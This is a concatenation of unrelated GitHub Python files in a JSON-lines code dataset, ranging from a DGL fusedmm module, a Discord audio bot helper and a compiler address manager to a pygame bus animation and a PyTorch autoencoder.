NumPy semantics. Please see\n https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html\n for more details about the NumPy broadcasting semantics.\n \"\"\".format(binary_op, reduce_op)\n # print(\"registering fusedmm function:\", name)\n def func(g, x, y):\n return gfusedmm(g, binary_op, reduce_op, x, y)\n func.__name__ = name\n # func.__doc__ = docstring\n return func\n\ndef _register_fusedmm_func():\n \"\"\"Register fusedmm functions\n\n - Binary operation plus reduction between u and e: u_[]_e_[]\n - Copy u plus reduction: copy_u_[]\n - Copy e plus reduction: copy_e_[]\n \"\"\"\n for binary_op in [\"fsub\", \"fdiv\", \"fmul\", \"fadd\", \"fused_cpy_u\", \"fused_cpy_e\"]:\n for reduce_op in [\"sum\", \"max\", \"min\", \"mean\", \"fdot\"]:\n if binary_op.startswith(\"fused_cpy\"):\n func = _gen_copy_reduce_func(binary_op, reduce_op)\n else:\n func = _gen_fusedmm_func(binary_op, reduce_op)\n setattr(sys.modules[__name__], func.__name__, func)\n __all__.append(func.__name__)\n\n_register_fusedmm_func()\n","repo_name":"khaled-rahman/FusedMM4DGL","sub_path":"python/dgl/ops/fusedmm.py","file_name":"fusedmm.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"43538222194","text":"# link do zadania:\n# https://www.codewars.com/users/Krzys194/completed_solutions\n \ndef hotpo(n):\n i = 0\n while n > 1:\n if n % 2 == 0:\n n /= 2\n i += 1\n else:\n n = 3 * n + 1\n i += 1\n return i\n\nhotpo(23)","repo_name":"krzys194/CodeWars","sub_path":"CollatzConjecture(8kyu).py","file_name":"CollatzConjecture(8kyu).py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25513454772","text":"from BotGlobals import BACK_BOT, RARITY_COLORS\nfrom .embedHelpers import back_embed\nimport discord\nimport discord.opus as opus\nimport asyncio\nfrom os.path import split\n\nasync def nil_corout():\n return\n\nasync def play_opus_audio_to_channel_then_leave(message, opus_filename,\\\n failure_coroutine = nil_corout,\n back_bot = BACK_BOT,\n rarity_colors = RARITY_COLORS,\n give_loot = True):\n \"\"\"\n Plays a .opus audio file through the bot.\n\n The bot will join the channel of the Member associated with the message if\n possible. Then, will play the audio file.\n\n If there is a failure for whatever reason, the failure_coroutine will run\n with no arguements. Most errors will be raised afterward.\n\n \"\"\"\n channel = message.author.voice.channel\n if(opus.is_loaded() and isinstance(message.author, discord.Member)\\\n and channel != None):\n print(opus_filename)\n #Move to the correct voice channel\n\n # if(back_bot.is_voice_connected(message.author.server)):\n # voice_client = back_bot.voice_client_in(message.author.server)\n # await voice_client.disconnect()\n try:\n voice_client = await channel.connect()\n def disconnect_from_vc(*args):\n dc_fut = asyncio.run_coroutine_threadsafe(voice_client.disconnect(), back_bot.loop)\n try:\n dc_fut.result()\n except:\n dc_fut.cancel()\n\n #Play the audio, then disconnect\n try:\n\n voice_client.play(discord.FFmpegPCMAudio(opus_filename), after = disconnect_from_vc)\n\n\n except Exception as e:\n print(\"Back out! Couldn't play the audio!\", e)\n await asyncio.wait_for(voice_client.disconnect(), 10)\n await failure_coroutine()\n raise e\n\n except discord.errors.ConnectionClosed as cE:\n print(\"There's a connection backup!\", cE)\n return\n\n except Exception as e:\n print(\"Hang back! No audio play!\")\n await failure_coroutine()\n raise e\n\n head, clip = split(opus_filename)\n base, rarity = split(head)\n em = back_embed(clip, rarity, rarity_colors, back_bot, message.author.name)\n await message.channel.send(embed=em)\n if(give_loot):\n back_bot.lootTracker(message.author, rarity, clip)\n\n else:\n await failure_coroutine()\n #EXIT\n","repo_name":"pillig/back-bot","sub_path":"HelperFunctions/asyncFunctions.py","file_name":"asyncFunctions.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10413368514","text":"import unittest\nfrom shapely import prepared\nfrom shapely import geometry\n\n\nclass PreparedGeometryTestCase(unittest.TestCase):\n \n def test_prepared(self):\n p = prepared.PreparedGeometry(geometry.Point(0.0, 0.0))\n\n\ndef test_suite():\n return unittest.TestLoader().loadTestsFromTestCase(\n PreparedGeometryTestCase\n )\n","repo_name":"BertrandGervais/shapely","sub_path":"shapely/tests/test_prepared.py","file_name":"test_prepared.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"20516209439","text":"from src.variables import vars as v \n\n## v.variable_name\n## Config variables in .src/variables.py\n\nclass config:\n \n FILE=\"paraadads.txt\" ## FILE NAME + EXTENSION || example.txt || or other extension\n OS_ALIAS=\"my os aliases\"\n \nclass message:\n TEXT = f\"\"\"\n Hi1\n HI + 2\n Hi 3 _\n Example 1 2 3 {v.variable1}\n {v.variable2}\n {v.variable3}\n {v.variable4}\n {v.variable5}\n {v.variable6}\n \"\"\" \n\nclass options:\n \n history = False\n os_aliases = True\n","repo_name":"iSebDev/filewriter-python","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24322645519","text":"import os \nos.environ['MKL_THREADING_LAYER'] = \"GNU\"\nimport argparse\nimport numpy as np\nimport shutil\n\ndef main(args):\n task_list = np.arange(args.num_tasks)\n task_list = [str(task) for task in task_list]\n\n target_tasks = args.target_tasks\n other_tasks = [task for task in task_list if task not in target_tasks]\n\n num_samples = args.num_samples\n max_task_num = args.max_task_num\n min_task_num = args.min_task_num\n for _ in range(num_samples):\n # create a set of trained task combinations\n sampled_task_dir = os.path.join(\"./sampled_tasks\", \"{}.txt\".format(args.task_set_name))\n if not os.path.exists(sampled_task_dir):\n f = open(sampled_task_dir, \"w\")\n f.close()\n \n with open(sampled_task_dir, \"r\") as f:\n sampled_tasks = set()\n for line in f.readlines():\n sampled_tasks.add(line.rstrip(\"\\n\"))\n # print(sampled_tasks)\n\n # train on a new task combination\n with open(sampled_task_dir, \"a\") as f:\n if len(target_tasks) == 0:\n tmp_other_task_num = np.random.randint(\n low=min_task_num, \n high=max_task_num+1\n )\n tmp_sampled_other_tasks = np.random.choice(other_tasks, size=tmp_other_task_num,replace=False)\n \n tmp_sampled_tasks = tmp_sampled_other_tasks\n tmp_sampled_tasks.sort()\n tmp_sampled_tasks = \" \".join(tmp_sampled_tasks)\n else:\n tmp_target_task_num = np.random.randint(low=1, high=len(target_tasks)+1)\n tmp_sampled_target_tasks = np.random.choice(target_tasks, size=tmp_target_task_num, replace=False)\n\n tmp_other_task_num = np.random.randint(\n low=max(min_task_num-tmp_target_task_num, 0), \n high=max_task_num-tmp_target_task_num+1\n )\n tmp_sampled_other_tasks = np.random.choice(other_tasks, size=tmp_other_task_num,replace=False)\n \n tmp_sampled_tasks = np.concatenate([tmp_sampled_target_tasks, tmp_sampled_other_tasks])\n tmp_sampled_tasks.sort()\n tmp_sampled_tasks = \" \".join(tmp_sampled_tasks)\n \n if tmp_sampled_tasks in sampled_tasks:\n continue\n print(tmp_sampled_tasks)\n \n os.system(\"CUDA_VISIBLE_DEVICES={} python train_multi_instruction_v3.py \\\n --do_train \\\n --do_eval \\\n --predict_with_generate \\\n --model_name_or_path {} \\\n --max_source_length 512 \\\n --max_target_length 128 \\\n --pad_to_max_length True \\\n --generation_max_length 128 \\\n --data_dir data/splits/default \\\n --task_dir data/tasks \\\n --overwrite_output_dir \\\n --cache_dir ./cache/ \\\n --overwrite_cache \\\n --per_device_train_batch_size 8 \\\n --per_device_eval_batch_size 8 \\\n --gradient_accumulation_steps 1 \\\n --learning_rate {} \\\n --lr_scheduler_type constant \\\n --max_steps {} \\\n --warmup_steps 0 \\\n --logging_strategy steps \\\n --logging_steps 500 \\\n --evaluation_strategy steps \\\n --eval_steps {} \\\n --save_strategy steps \\\n --save_steps {} \\\n --metric_for_best_model eval_exact_match\\\n --greater_is_better True \\\n --downsample {} \\\n --task_name {} \\\n --template_idx {} \\\n --output_dir saved/ \\\n --load_best_model_at_end \\\n --disable_tqdm True \\\n --runs {}\\\n --save_name {}\".format(\n args.device, args.model_name_or_path, args.lr, args.max_steps, args.eval_steps, args.save_steps,\n args.downsample, args.dataset, tmp_sampled_tasks, args.runs, args.save_name\n ))\n instruction_idxs = \"[\" + \", \".join(tmp_sampled_tasks.split(\" \")) + \"]\"\n output_dir = os.path.join(\"saved\", \"{}_{}_{}\".format(args.dataset, instruction_idxs, args.model_name_or_path))\n # delete the output_dir\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n\n sampled_tasks.add(tmp_sampled_tasks)\n f.write(tmp_sampled_tasks + \"\\n\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num_tasks\", type=int, default=10)\n parser.add_argument(\"--target_tasks\", nargs='+', type=str, default=[])\n\n parser.add_argument(\"--model_name_or_path\", type=str, default=\"t5-base\")\n parser.add_argument(\"--num_samples\", type=int, default=1)\n parser.add_argument(\"--min_task_num\", type=int, default=3)\n parser.add_argument(\"--max_task_num\", type=int, default=3)\n\n parser.add_argument(\"--dataset\", type=str, default=\"rte\")\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--lr\", type=float, default=5e-5)\n parser.add_argument(\"--max_steps\", type=int, default=5000)\n parser.add_argument(\"--eval_steps\", type=int, default=500)\n parser.add_argument(\"--save_steps\", type=int, default=500)\n parser.add_argument(\"--downsample\", type=int, default=500)\n parser.add_argument(\"--runs\", type=int, default=3)\n\n parser.add_argument(\"--task_set_name\", type=str, default=\"sampled_tasks\")\n parser.add_argument(\"--save_name\", type=str, default=\"sampled_tasks\")\n\n args = parser.parse_args()\n main(args)","repo_name":"anonymous-researchcode/Task-Grouping-For-Instruction-Tuning","sub_path":"train_sample_instructions.py","file_name":"train_sample_instructions.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2810753182","text":"from errorHandler import errorHandler\n\nclass addressManager():\n\tdef __init__(self):\n\n\t\tself.errorHandler = errorHandler()\n\n\t\t#------------------------------------------------------\n\t\t# \tSTATIC ADDRESSES\n\t\t#------------------------------------------------------\n\t\tself.MEMORY_BEGIN = 1000\n\t\tself.MEMORY_END = 32999\n\n\t\tself.BEGIN_GLOBALS = 1000\n\t\tself.GLOBALS_INT = 1000\n\t\tself.GLOBALS_FLOAT = 3000\n\t\tself.GLOBALS_BOOLEAN = 5000\n\t\tself.GLOBALS_STRING = 7000\n\t\tself.GLOBALS_OBJECT = 9000\n\t\tself.END_GLOBALS = 10999\n\n\t\tself.BEGIN_LOCALS = 11000\n\t\tself.LOCALS_INT = 11000\n\t\tself.LOCALS_FLOAT = 13000\n\t\tself.LOCALS_BOOLEAN = 15000\n\t\tself.LOCALS_STRING = 17000\n\t\tself.LOCALS_OBJECT = 19000\n\t\tself.END_LOCALS = 20999\n\n\t\tself.BEGIN_TEMPORALS = 21000\n\t\tself.TEMPORALS_INT = 23000\n\t\tself.TEMPORALS_FLOAT = 25000\n\t\tself.TEMPORALS_BOOLEAN = 27000\n\t\tself.TEMPORALS_STRING = 29000\n\t\tself.TEMPORALS_OBJECT = 31000\n\t\tself.END_TEMPORALS = 32999\n\n\t\t#--------------------------------------------------------\n\t\t#\tCOUNTER ADDRESSES\n\t\t#--------------------------------------------------------\n\t\tself.COUNTER_GLOBALS_INT = self.GLOBALS_INT\n\t\tself.COUNTER_GLOBALS_FLOAT = self.GLOBALS_FLOAT\n\t\tself.COUNTER_GLOBALS_BOOLEAN = self.GLOBALS_BOOLEAN\n\t\tself.COUNTER_GLOBALS_STRING = self.GLOBALS_STRING\n\t\tself.COUNTER_GLOBALS_OBJECT = self.GLOBALS_OBJECT\n\n\t\tself.COUNTER_LOCALS_INT = self.LOCALS_INT\n\t\tself.COUNTER_LOCALS_FLOAT = self.LOCALS_FLOAT\n\t\tself.COUNTER_LOCALS_BOOLEAN = self.LOCALS_BOOLEAN\n\t\tself.COUNTER_LOCALS_STRING = self.LOCALS_STRING\n\t\tself.COUNTER_LOCALS_OBJECT = self.LOCALS_OBJECT\n\n\t\tself.COUNTER_TEMPORALS_INT = self.TEMPORALS_INT\n\t\tself.COUNTER_TEMPORALS_FLOAT = self.TEMPORALS_FLOAT\n\t\tself.COUNTER_TEMPORALS_BOOLEAN = self.TEMPORALS_BOOLEAN\n\t\tself.COUNTER_TEMPORALS_STRING = self.TEMPORALS_STRING\n\t\tself.COUNTER_TEMPORALS_OBJECT = self.TEMPORALS_OBJECT\n\n\t# Method that given an address direction, return to which segment belongs\n\tdef getMemorySegment(self, stringAddress):\n\t\t# Parse address to int\n\t\taddress = int(stringAddress)\n\n\t\t# Context and varType variables\n\t\tcontext = \"NoContext\"\n\t\tvarType = \"NoType\"\n\n\t\tif self.BEGIN_GLOBALS <= address <= self.END_GLOBALS:\n\t\t\tcontext = \"global\"\n\t\t\tif self.GLOBALS_INT <= address < self.GLOBALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.GLOBALS_FLOAT <= address < self.GLOBALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.GLOBALS_BOOLEAN <= address < self.GLOBALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.GLOBALS_STRING <= address < self.GLOBALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.GLOBALS_OBJECT <= address <= self.END_GLOBALS:\n\t\t\t\tvarType = \"obj\"\n\t\telif self.BEGIN_LOCALS <= address <= self.END_LOCALS:\n\t\t\tcontext = \"local\"\n\t\t\tif self.LOCALS_INT <= address < self.LOCALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.LOCALS_FLOAT <= address < self.LOCALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.LOCALS_BOOLEAN <= address < self.LOCALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.LOCALS_STRING <= address < self.LOCALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.LOCALS_OBJECT <= address <= self.END_LOCALS:\n\t\t\t\tvarType = \"obj\"\n\t\telif self.BEGIN_TEMPORALS <= address <= self.END_TEMPORALS:\n\t\t\tcontext = \"temporal\"\n\t\t\tif self.TEMPORALS_INT <= address < self.TEMPORALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.TEMPORALS_FLOAT <= address < self.TEMPORALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.TEMPORALS_BOOLEAN <= address < self.TEMPORALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.TEMPORALS_STRING <= address < self.TEMPORALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.TEMPORALS_OBJECT <= address <= self.END_TEMPORALS:\n\t\t\t\tvarType = \"obj\"\n\t\telse:\n\t\t\tself.error.definition(self.error.INVALID_MEMORY_ACCESS, stringAddress, None)\n\n\t\tmemorySegment = [context, varType]\n\t\treturn memorySegment\n\t\t\t\n\t#Method that returns the virtual address available\n\tdef getVirtualAddress(self, data_Type, scope):\n\t\tif scope == \"temporal\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_OBJECT\n\t\telif scope == \"local\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_LOCALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_LOCALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_LOCALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_LOCALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_LOCALS_OBJECT\n\t\telif scope == \"global\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_GLOBALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_GLOBALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_GLOBALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_GLOBALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_GLOBALS_OBJECT\n\t\n\t#Method that updates the virtual addresses\n\tdef updateVirtualAddress(self, data_Type, scope, size=1):\n\t\tif scope == \"temporal\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_TEMPORALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_TEMPORALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_TEMPORALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_TEMPORALS_STRING += size\n\t\telif scope == \"local\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_LOCALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_LOCALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_LOCALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_LOCALS_STRING += size\n\t\telif scope == \"global\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_GLOBALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_GLOBALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_GLOBALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_GLOBALS_STRING += size\n\n\t# Method that returns type of operator\n\tdef typeOfOperator(self, operator):\n\t\ttypeOperator = \"NoType\"\n\n\t\tassignmentOperators = [\"=\"]\n\t\tarithmeticOperators = [\"+\", \"-\", \"*\", \"/\"]\n\t\trelationalOperators = [\">\", \">=\", \"<\", \"<=\", \"==\", \"!=\"]\n\t\tlogicalOperators = [\"&&\", \"||\"]\n\n\t\tif operator in assignmentOperators:\n\t\t\ttypeOperator = \"assignment\"\n\t\telif operator in arithmeticOperators:\n\t\t\ttypeOperator = \"arithmetic\"\n\t\telif operator in relationalOperators:\n\t\t\ttypeOperator = \"relational\"\n\t\telif operator in logicalOperators:\n\t\t\ttypeOperator = \"logical\"\n\n\t\treturn typeOperator\n\n\t#Method that restarts counter for the local and temporal addresses \n\t# every time it enters to a new function \n\tdef restartVirtualAddress(self):\n\t\tself.COUNTER_TEMPORALS_INT = self.TEMPORALS_INT\n\t\tself.COUNTER_TEMPORALS_FLOAT = self.TEMPORALS_FLOAT\n\t\tself.COUNTER_TEMPORALS_BOOLEAN = self.TEMPORALS_BOOLEAN\n\t\tself.COUNTER_TEMPORALS_STRING = self.TEMPORALS_STRING\n\t\tself.COUNTER_TEMPORALS_OBJECT = self.TEMPORALS_OBJECT\n\t\tself.COUNTER_LOCALS_INT = self.LOCALS_INT\n\t\tself.COUNTER_LOCALS_FLOAT = self.LOCALS_FLOAT\n\t\tself.COUNTER_LOCALS_BOOLEAN = self.LOCALS_BOOLEAN\n\t\tself.COUNTER_LOCALS_STRING = self.LOCALS_STRING\n\t\tself.COUNTER_LOCALS_OBJECT = self.LOCALS_OBJECT","repo_name":"CharlieBradbury/One-For-All","sub_path":"addressManager.py","file_name":"addressManager.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14530905791","text":"# Воробьев Даниил ИУ7-21Б\r\n\r\nimport pygame\r\nfrom math import *\r\n\r\n# Создание окна\r\nwindow = pygame.display.set_mode((900, 500))\r\nscreen = pygame.Surface((900, 500))\r\nroad = pygame.Surface((900, 100))\r\npygame.display.set_caption(\"4 laba\")\r\n\r\n# Цвета\r\nasphalt = (90,90,90)\r\nsky = (135, 206, 235)\r\nred = (255, 0, 0)\r\ngreen = (34, 139, 34)\r\nblack = (0,0,0)\r\ngrey = (192, 192, 192)\r\nman = (255, 127, 80)\r\nwhite = (255, 255, 255)\r\nblue = (0, 0, 255)\r\nbrown = (102, 53, 0)\r\n\r\n# Переменные для движения автобуса\r\nwheel1_x = -2000\r\nwheel1_y = 385\r\nwheel1_change = 5\r\nangle = 3.14\r\nangle1 = 1.57\r\nx = wheel1_x - 10\r\ny = wheel1_y\r\nx1 = wheel1_x\r\ny1 = wheel1_y - 10\r\n\r\n# Переменные для движения человека\r\npas_x = 1000\r\npas_y = 380\r\npas_change = 1\r\nfoot = 2\r\ni = 0\r\ntime = 0\r\ntime2 = 0\r\n\r\nrun = True\r\nwhile run:\r\n # Проверка на выход из программы\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n screen.fill(sky)\r\n road.fill(asphalt)\r\n\r\n # Изменение позиции колес\r\n if wheel1_x < 540 or time > 100:\r\n x = wheel1_x + 10*cos(angle)\r\n y = wheel1_y + 10*sin(angle)\r\n x1 = wheel1_x + 10*cos(angle1)\r\n y1 = wheel1_y + 10*sin(angle1)\r\n angle+=0.095\r\n angle1+=0.095\r\n\r\n # Рисование облаков\r\n pygame.draw.rect(screen, white, [280,90,60,40])\r\n pygame.draw.circle(screen, white,[280,110],20 )\r\n pygame.draw.circle(screen, white, [340,105],25)\r\n pygame.draw.circle(screen, white, [300,90],17)\r\n pygame.draw.circle(screen, white, [325,80],20)\r\n pygame.draw.rect(screen, white, [640,110,60,40])\r\n pygame.draw.circle(screen, white,[640,130],20 )\r\n pygame.draw.circle(screen, white, [700,125],25)\r\n pygame.draw.circle(screen, white, [660,110],17)\r\n pygame.draw.circle(screen, white, [685,100],20)\r\n\r\n # Остановка\r\n pygame.draw.rect(screen, black, (550, 335 , 100, 75), 6)\r\n pygame.draw.rect(screen, green, (553, 338 , 94, 63))\r\n pygame.draw.rect(screen, white, (670, 338 , 20, 10))\r\n pygame.draw.rect(screen, black, (667, 338 , 23, 13),6)\r\n pygame.draw.line(screen, black, (677, 348), (677, 400), 6)\r\n\r\n # Пассажир идет на остановку\r\n if foot % 64 == 0:\r\n i = 3\r\n else:\r\n if foot % 32 == 0:\r\n i = 0\r\n \r\n if time < 100:\r\n # Пассажир идет на остановку\r\n pygame.draw.line(screen, blue, (int(pas_x), int(pas_y)), (pas_x + 5 - i, pas_y + 20), 3)\r\n pygame.draw.line(screen, blue, (pas_x, pas_y), (pas_x - 5 + i, pas_y + 20), 3)\r\n pygame.draw.line(screen, brown, (pas_x, pas_y), (pas_x, pas_y - 20), 3)\r\n pygame.draw.line(screen, brown, (pas_x, pas_y - 20), (pas_x + 5, pas_y), 3)\r\n pygame.draw.line(screen, brown, (pas_x, pas_y - 20), (pas_x - 5, pas_y), 3)\r\n pygame.draw.circle(screen, man, (int(pas_x), 352), 8)\r\n pygame.draw.circle(screen, black, (int(pas_x) - 5, 352), 1)\r\n pygame.draw.line(screen, red, (pas_x - 2, 356), (pas_x - 4, 356), 1)\r\n else:\r\n # Пассажир в автобусе\r\n pygame.draw.circle(screen, man, (int(wheel1_x) + 60, 340), 8)\r\n pygame.draw.circle(screen, black, (int(wheel1_x) + 60 - 5, 340), 1)\r\n pygame.draw.line(screen, red, (wheel1_x + 60 - 2, 344), (wheel1_x + 60 - 4, 344), 1)\r\n pygame.draw.line(screen, brown, (wheel1_x + 60, pas_y - 20), (wheel1_x + 60, pas_y - 33), 3)\r\n pygame.draw.line(screen, brown, (wheel1_x + 60 - 10, 355), (wheel1_x + 60, 348), 4)\r\n\r\n # Водитель автобуса\r\n pygame.draw.circle(screen, man, (int(wheel1_x) + 112, 340), 8)\r\n pygame.draw.circle(screen, black, (int(wheel1_x) + 117, 340), 1)\r\n pygame.draw.line(screen, red, (wheel1_x+115, 344), (wheel1_x+117,344), 1)\r\n pygame.draw.line(screen, blue, (wheel1_x+112, 348), (wheel1_x+122,355), 3)\r\n pygame.draw.line(screen, blue, (wheel1_x+112, 348), (wheel1_x+112,355), 4)\r\n\r\n # Автобус\r\n pygame.draw.rect(screen, red, (wheel1_x - 30, 355 , 163, 40))\r\n pygame.draw.rect(screen, red, (wheel1_x - 29, 325 , 65, 30), 4)\r\n pygame.draw.rect(screen, red, (wheel1_x + 35, 325 , 66, 30), 4)\r\n pygame.draw.rect(screen, red, (wheel1_x + 100, 325 , 31, 30), 4)\r\n\r\n # Колеса \r\n pygame.draw.circle(screen, black, (int(wheel1_x), wheel1_y), 15)\r\n pygame.draw.circle(screen, black, (int(wheel1_x) + 105, wheel1_y), 15)\r\n pygame.draw.circle(screen, grey, (int(wheel1_x), wheel1_y), 11, 2)\r\n pygame.draw.circle(screen, grey, (int(wheel1_x) + 105, wheel1_y), 11, 2)\r\n \r\n pygame.draw.line(screen, grey, (x,y),\r\n (2*wheel1_x - x, 2 * wheel1_y - y), 1)\r\n pygame.draw.line(screen, grey, (x1,y1),\r\n (2*wheel1_x - x1, 2 * wheel1_y - y1), 1)\r\n\r\n pygame.draw.line(screen, grey, (x+105,y),\r\n (2*wheel1_x - x+105, 2 * wheel1_y - y), 1)\r\n pygame.draw.line(screen, grey, (x1+105,y1),\r\n (2*wheel1_x - x1+105, 2 * wheel1_y - y1), 1)\r\n\r\n # Смещение автобуса\r\n if wheel1_x < 540 or time > 100:\r\n wheel1_x += wheel1_change\r\n else:\r\n time += 2\r\n \r\n # Смещение пассажира \r\n if pas_x > 600: \r\n pas_x -= pas_change\r\n foot += 1\r\n\r\n # Зацикливание \r\n if wheel1_x == 900:\r\n time2 += 1\r\n if time2 > 0 and time2 < 100:\r\n time2 += 1\r\n if time2 >= 100:\r\n wheel1_x = -2000\r\n pas_x = 1000\r\n time = 0\r\n time2 = 0\r\n foot = 2\r\n i = 0\r\n\r\n window.blit(screen, (0, 0))\r\n window.blit(road, (0,400))\r\n pygame.display.flip()\r\n pygame.time.delay(10)\r\npygame.quit()\r\n","repo_name":"RustyDanya/programming-on-python","sub_path":"lab_04/04_pygame.py","file_name":"04_pygame.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28217558450","text":"if __name__ == \"__main__\":\n arr = list(map(int, input().split()))\n k = int(input())\n x = int(input())\n i = 0\n flag = 0\n while(i < len(arr)):\n if arr[i] == x:\n print(i)\n flag = 1\n diff = x-arr[i]\n i = i + max(1, int(abs(arr[i] - x) / k))\n if flag == 0:\n print(\"Not Present\")\n","repo_name":"Aditi219/dsa-Sheet","sub_path":"searching and sorting/adjacentDifferByK_E.py","file_name":"adjacentDifferByK_E.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5911701790","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : AE.py\n@Time : 1/27/21 2:51 PM\n@Author : Liangliang\n@Software: PyCharm\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import optim as optimizer\n\n\nclass autoencoder(nn.Module):\n def __init__(self, X, number=[200, 100, 50]):\n super(autoencoder, self).__init__()\n self.layer1 = nn.Linear(number[0], number[1])\n self.layer2 = nn.Linear(number[1],number[2])\n self.layer3 = nn.Linear(number[2], number[1])\n self.layer4 = nn.Linear(number[1], number[0])\n self.X = torch.FloatTensor(X)\n def forward(self):\n h = self.layer1(self.X)\n h = torch.sigmoid(h)\n h = self.layer2(h)\n h = torch.sigmoid(h)\n h = self.layer3(h)\n h = torch.sigmoid(h)\n h = self.layer4(h)\n return h\n\ndef Loss(X, Y):\n loss = torch.norm(X-Y, 'fro')/X.shape[1]\n return loss\n\ndef train(X):\n X = torch.FloatTensor(X)\n number = [X.shape[1], 100, 50]\n net = autoencoder(X, number)\n optimizer = torch.optim.SGD(net.parameters(), lr=0.152)\n for _ in range(100):\n Y = net.forward()\n loss = Loss(X, Y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return Y.detach()\n\n","repo_name":"hmliangliang/GNN-MNA","sub_path":"GNN-NMA/AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74528389983","text":"from model.Entitet import Entitet\nfrom model.Igrac import Igrac\nfrom model.Lokacija import Lokacija\nfrom model.MjesanjeDvaUnosa import MjesanjeDvaUnosa\nfrom model.MjesanjeTriUnosa import MjesanjeTriUnosa\nfrom model.PartijaDvaIgraca import PartijaDvaIgraca\nimport json\n\nfrom model.PartijaDvaPara import PartijaDvaPara\nfrom model.PartijaTriIgraca import PartijaTriIgraca\n\n\nclass Start:\n def __init__(self):\n self._partije = []\n self.ucitajPartije()\n for p in self._partije:\n print(p)\n #self.testiranje()\n\n def testiranje(self):\n e = Entitet(1) # apstraktna klasa se može instancirati\n print(e.sifra)\n igrac = Igrac(1, \"Tomislav\", \"Jakopec\", \"\", 1)\n print(igrac.sifra)\n # mjesanje = Mjesanje(1) #TypeError: Can't instantiate abstract class 